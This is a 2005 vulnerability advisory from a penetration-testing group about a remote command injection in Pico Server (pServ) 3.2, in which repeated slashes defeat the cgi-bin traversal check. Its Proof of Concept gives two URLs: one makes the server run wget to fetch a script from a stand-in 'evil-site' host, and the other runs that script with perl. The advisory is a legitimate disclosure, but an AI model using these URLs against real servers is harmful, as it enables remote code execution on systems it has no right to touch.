Contact

Contact us

+49 241 510081-0
kontakt@redteam-pentesting.de
Contact form
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

Pico Server (pServ) Remote Command Injection

RedTeam found a remote command injection in Pico Server (pServ) which results in a remote attacker being able to issue arbitrary commands on the server.

Details

  • Product: Pico Server (pServ)
  • Affected Version: 3.2(verified), <=3.2 probably too
  • Immune Version: 3.3
  • OS affected: all
  • Security-Risk: very high
  • Remote-Exploit: yes
  • Vendor-URL: http://pserv.sourceforge.net/
  • Vendor-Status: new version available
  • Advisory-URL: https://www.redteam-pentesting.de/advisories/rt-sa-2005-010
  • Advisory-Status: published
  • CVE: CAN-2005-1365 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365)

Introduction

From https://pserv.sourceforge.net/:

Pico Server is a small web server. It is meant to be portable and configurable.

  • small, portable
  • fast
  • CGI-BIN support
  • auto-indexing of directories
  • access and error logging (see p-reporter for an analyzer)
  • forking or single-connection at choice

Pico Server (pServ) is written in portable C (K&R style so it can compile on older compilers too) and sports several options that by means of #define statements can customize the behavior, the performance and the feature set so to be able to fit better the the requisites.

If pServ is compiled with support for CGI-BIN a remote attacker is able to execute any program (with pServ permissions) on the server by traversing out of the cgi-bin directory.

More Details

pServ has CGI-BIN support. Only URLs beginning with “cgi-bin” are treated as cgi-scripts. To avoid that a user traverses out of the cgi-bin using traditional /../, pServ parses the requested url. It increases a counter by one if it parses a / (new subdir) and decreases the counter if ist parses /../. If the counter goes below zero the url is rejected as illegal. Unfortunately an attacker can avoid beeing rejected, just using enough / in the url (without directory names between them), so he can traverse out of the cgi-bin by adding some /../ . This lets the attacker execute any program on the server (with pServ permissions).

Proof of Concept

The following url downloads a script (or executable) to the server:

http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

This is how the script can be executed afterwards:

http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl

Workaround

The only workaround is to compile pServ without support for cgi-bin.

Fix

The Developers have released Version 3.3. This version should fix the problem. The changes have not been tested by RedTeam, yet.

Security Risk

The security risk is rated very high because a remote attacker can use this flaw to execute arbitrary code on the server (with the permissions of pServ).

History

  • 2005-04-29 found
  • 2005-05-02 first attempt to inform developers
  • 2005-05-02 CAN-number assigned
  • 2005-05-04 second attempt to inform developers
  • 2005-05-16 new version released. Advisory published
  • 2009-05-08 Updated Advisory URL

RedTeam

RedTeam is a penetration testing group working at the Laboratory for Dependable Distributed Systems at RWTH-Aachen University. You can find more Information on the RedTeam Project at https://www.redteam-pentesting.de